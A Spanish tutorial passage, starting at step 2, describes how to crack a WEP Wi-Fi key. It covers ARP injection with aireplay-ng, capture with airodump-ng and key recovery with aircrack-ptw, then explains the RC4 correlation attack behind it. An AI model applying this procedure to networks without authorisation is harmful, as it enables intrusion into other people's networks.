Paso 2: Generar algo de tráfico. Para generar algo de tráfico, usa aireplay-ng en modo ARP injection. Airplay buscara en la red hasta que encuentre un paquete ARP encriptado. Reinjectando este paquete una y otra vez, generaras mucho trafico, y así sabrás que la mayoría de trafico es trafico-ARP. Para un packete ARP, se conocen los 16 primeros Bytes de texto en claro y entonces también los primeros 16 bytes del cipherstream.

Paso 3: Escribe este trafico al disco usando airodump-ng. Esto creara un archivo con el trafico TCP capturado.

Paso 4: Lanza el algoritmo. Necesitaras aircrack-ptw (por cierto, aircrack-ptw ha sido integrado en la versión 0.9-dev de aircrack-ng, la cual esta actualmente en svn, pero no ha sido lanzada).


Desde un punto de vista teórico, el algoritmo se basa en las siguientes ideas.
Andreas Klein, un investigador alemán, demostró que hay una correlación en RC4 entre los Keybytes 1 al i-1, la keystrem y el keybyte i. Si los keybytes 1 al i-1 y la keystream son conocidos, es posible adivinar el siguiente keybyte con una probabilidad de 1.36/256 lo cual es un poco máyor que 1/256. Esto permite que sea posible adivinar la suma de los keybytes i hasta i+k con una probabilidad de mas de 1.24/256.

En el ambiente de WEP, los primeros tres bytes de un paquete clave, siempre son conocidos y son llamados IV. Esta herramienta trata de adivinar la suma de los siguientes 1,2,3, ... hasta 13 keybytes para cada paquete. Si se han capturado los paquetes suficientes, el valor adivinado un numero mayor de veces par una suma, usualmente sera el numero correcto. Si no el valor correcto en la mayoría de los casos sera uno de los mas adivinados.

Aircrack-ptw trata de encontrar la clave, usando la idea descrita anteriormente. Si se tienen de 40,000 a 85,000 paquetes, la probabilidad de éxito, estará entre el 50 y el 95 por ciento.